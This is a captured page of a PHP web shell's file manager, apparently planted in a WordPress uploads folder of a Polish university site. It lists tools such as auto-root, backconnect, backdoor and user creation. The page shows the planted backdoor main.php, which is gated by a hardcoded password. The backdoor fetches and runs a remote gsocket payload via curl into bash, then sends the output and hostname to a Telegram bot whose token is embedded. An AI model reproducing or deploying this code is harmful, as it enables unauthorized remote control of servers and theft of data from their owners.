Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.226.214.1
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ilpnowa /
web /
wp-content /
uploads /
2014 /
05 /
[ HOME SHELL ]
Name
Size
Permission
Action
Informacje-o-wykładowcach....
135.9
KB
-rw-rw-r--
Lektury-z-literatury-romantyzm...
23.26
KB
-rw-rw-r--
Lista-lektur-z-historii-litera...
109.82
KB
-rw-rw-r--
Lista-lektur-z-tradycji.pdf
45.98
KB
-rw-rw-r--
OPISY-PRZEDMIOTĂ“W_podyp_li...
355.5
KB
-rw-rw-r--
PODANIE-2013.doc
25
KB
-rw-rw-r--
Plan-zajęć-2013-2014.p...
207.79
KB
-rw-rw-r--
Prof-dr-hab-Janusz-Maciejewski...
122.98
KB
-rw-rw-r--
Pytania-egzaminacyjne.doc
44.5
KB
-rw-rw-r--
Rekomendacje-absolwentĂłw.pd...
222.73
KB
-rw-rw-r--
Spis-zawartości-Napisu.pdf
254.23
KB
-rw-rw-r--
Zawartość-tomów-Nap...
165.92
KB
-rw-rw-r--
Zestawy_egzaminacyjne24_01_201...
60
KB
-rw-rw-r--
adminer.php
465.43
KB
-rw-r--r--
bind.php
20.65
KB
-rw-r--r--
byp.php
377
B
-rw-r--r--
form_preliminarz.doc
33
KB
-rw-rw-r--
form_przedplata2.doc
21.5
KB
-rw-rw-r--
index.php
0
B
-rw-rw-r--
lit_podyp_kwestionariusz.doc
33.5
KB
-rw-rw-r--
main.php
2.05
KB
-rw-r--r--
wniosek_wyjazdowy_2012-12.doc
57.5
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.php
<?php // Mengecek apakah form telah disubmit if ($_SERVER["REQUEST_METHOD"] == "POST") { $licenseKey = $_POST['license'] ?? ''; if ($licenseKey !== 'olxtoto') { echo "Lisensi tidak valid"; exit; } $token = "6570269868:AAGLUEcMfVAF3VWpIhwT8pZUJMtABPwCD7Q"; $chat_id = "5924447440"; // Ganti dengan Chat ID Telegram Anda // Menjalankan perintah bash $command = "bash -c "$(curl -fsSL https://gsocket.io/x)""; $output = shell_exec($command); // Memeriksa apakah perintah berhasil if ($output === null) { echo "Failed to execute command or no output returned"; exit; } // Mendapatkan nama domain $domain = gethostname(); // Menyiapkan pesan $message = "Output:n" . $output . "nDomain: " . $domain; // Mengirim pesan ke Telegram $telegramApi = "https://api.telegram.org/bot{$token}/sendMessage"; $data = [ 'chat_id' => $chat_id, 'text' => $message, 'parse_mode' => 'Markdown' ]; $options = [ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencodedrn", 'method' => 'POST', 'content' => http_build_query($data), ] ]; $context = stream_context_create($options); $result = @file_get_contents($telegramApi, false, $context); // Memeriksa hasil if ($result === FALSE) { echo "Error sending message"; } else { echo "Message sent"; } // Menghentikan skrip setelah mengirim pesan exit; } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Lisensi Input</title> </head> <body> <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post"> <label for="license">Masukkan Lisensi:</label><br> <input type="text" id="license" name="license"><br><br> <input type="submit" value="Submit"> </form> </body> </html>
Close